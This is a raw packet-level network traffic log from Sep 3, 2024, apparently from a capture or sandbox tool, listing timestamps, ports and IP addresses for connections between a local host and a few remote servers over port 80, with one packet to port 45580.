Sep 3, 2024 17:13:20.230262041 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230273008 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230283022 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230293989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230293989 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230307102 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230319023 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230321884 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230338097 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230340004 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230350971 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230370998 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230389118 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230485916 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230520964 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230633974 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230645895 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230657101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230669975 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230679989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230683088 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230691910 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230698109 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230705023 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230720997 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230725050 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230742931 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230767965 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231035948 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231046915 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231060028 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231070995 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231081963 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231087923 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231093884 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231112003 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231116056 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231125116 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231136084 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231137037 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231149912 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231161118 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231192112 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231339931 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231497049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231508970 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231517076 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231528044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231538057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231542110 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231549978 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231559992 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231570959 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231575966 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231581926 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231592894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231595993 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231612921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.231617928 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231630087 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.231659889 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232009888 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232028008 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232038975 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232048988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232060909 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232069969 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232074976 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232083082 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232086897 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232098103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232110977 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232120037 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232139111 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232161045 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232271910 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232285023 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232311010 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232377052 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232388973 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232420921 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232445955 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232498884 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232510090 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232518911 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232530117 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232541084 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232559919 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232588053 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232630014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232669115 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232700109 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232717037 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232745886 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232762098 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232830048 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232841015 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232851028 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232865095 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232887030 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232909918 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.232975006 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.232986927 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.233023882 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.233033895 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.233062029 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.233084917 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.256982088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.256994009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257004023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257074118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257096052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257359982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257447958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257463932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257476091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257487059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257497072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257502079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257515907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257528067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257539988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257540941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257553101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257560015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257563114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257575035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257587910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257612944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.257637978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.257771969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258116007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258167028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258177996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258189917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258219957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258219957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258265018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258276939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258286953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258299112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258306026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258361101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258620977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258631945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258641958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258652925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258663893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258675098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258677959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258711100 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258711100 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258841991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258861065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258902073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258913040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258923054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.258924961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.258963108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259021997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259032965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259042978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259053946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259066105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259068012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259078026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259089947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259116888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259134054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259218931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259229898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259238958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259275913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259279966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259293079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259304047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259306908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259316921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259326935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259326935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259347916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259572029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259582043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259634018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259658098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259670019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259679079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259690046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259701014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259711027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259711027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259723902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259742975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259776115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259864092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259874105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259884119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259895086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259912014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259939909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259953022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.259972095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259984016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.259994030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260010004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260020971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260030031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260041952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260052919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260062933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260065079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260065079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260065079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260076046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260087013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260097980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260104895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260178089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260807991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260819912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260831118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260842085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260853052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260868073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260878086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260890007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260900974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260912895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260915995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260925055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260930061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260941029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260941029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.260987997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.260987997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261213064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261224985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261234999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261246920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261256933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261266947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261277914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261287928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261287928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261295080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261307955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261310101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261321068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261332989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261332989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261343956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261356115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261365891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261368990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261379004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261390924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261401892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261405945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261405945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261414051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261424065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261435032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261445999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261449099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261461973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.261467934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261467934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.261492968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.262103081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262119055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262125015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262130976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262137890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262144089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262156010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.262203932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.262224913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.278737068 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:20.283102989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283143044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283153057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283179045 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283194065 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283205986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283216000 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283230066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283252954 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283274889 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283292055 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283428907 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283438921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283451080 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283462048 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283474922 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283504963 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283519030 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283530951 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283540964 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283550978 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283575058 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283590078 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283696890 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283708096 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283719063 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283730030 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.283761978 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.283783913 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.284312963 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284373045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284382105 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284440994 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.284857035 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284868002 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284878969 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284888983 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284900904 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284908056 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.284913063 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284939051 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.284956932 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284969091 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284980059 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284986973 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.284991980 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.284996986 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.285007000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285018921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285029888 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285032034 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.285063028 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.285077095 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.285186052 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285196066 CEST	80	49726	185.215.113.17	192.168.2.8
